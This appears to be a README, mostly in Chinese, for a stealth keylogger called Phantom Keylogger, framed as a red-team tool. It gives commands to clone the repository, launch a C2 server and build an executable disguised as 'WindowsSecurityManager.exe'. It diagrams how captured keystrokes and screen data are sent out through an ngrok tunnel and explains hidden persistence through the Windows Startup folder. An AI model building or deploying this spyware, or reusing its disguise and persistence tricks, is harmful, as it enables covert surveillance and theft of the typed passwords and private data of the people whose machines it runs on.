Phantom Keylogger 是一款先进的支持隐身能力的按键与视觉情报收集系统。该工具以行动安全为首要目标,在经授权的红队演练中提供持久监控能力,同时在目标系统上保持最小痕迹。
授权使用场景:
- 经授权的渗透测试操作
- 具备书面交战规则的红队演练
- 受控环境中的安全研究
- 防御性安全控制验证
禁止操作:
- 未经授权的监视活动
- 非法入侵或数据窃取
- 侵犯个人隐私
- 任何未经授权的攻击性操作
操作人员须对合规部署承担全部法律责任
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py
# Generate stealth executable
python build.py
输出:dist/WindowsSecurityManager.exe
投递方式:
# Start the GUI interface
python manager.py
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ TARGET │ │ C2 TUNNEL │ │ OPERATOR │
│ │ │ │ │ │
│ ┌─────────────┐│ │ ┌─────────────┐ │ │ ┌─────────────┐│
│ │ Stealth ││ │ │ Ngrok │ │ │ │ Management ││
│ │ Keylogger ├───────►│ Tunnel ├───────►│ Console ││
│ │ ││ │ │ │ │ │ │ ││
│ └─────────────┘│ │ └─────────────┘ │ │ └─────────────┘│
└─────────────────┘ └──────────────────┘ └─────────────────┘
启动文件夹:%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
在运行对话框(Win+R)中输入 shell:startup 即可轻松访问
文件名:WindowsSecurityManager.exe
属性:隐藏系统文件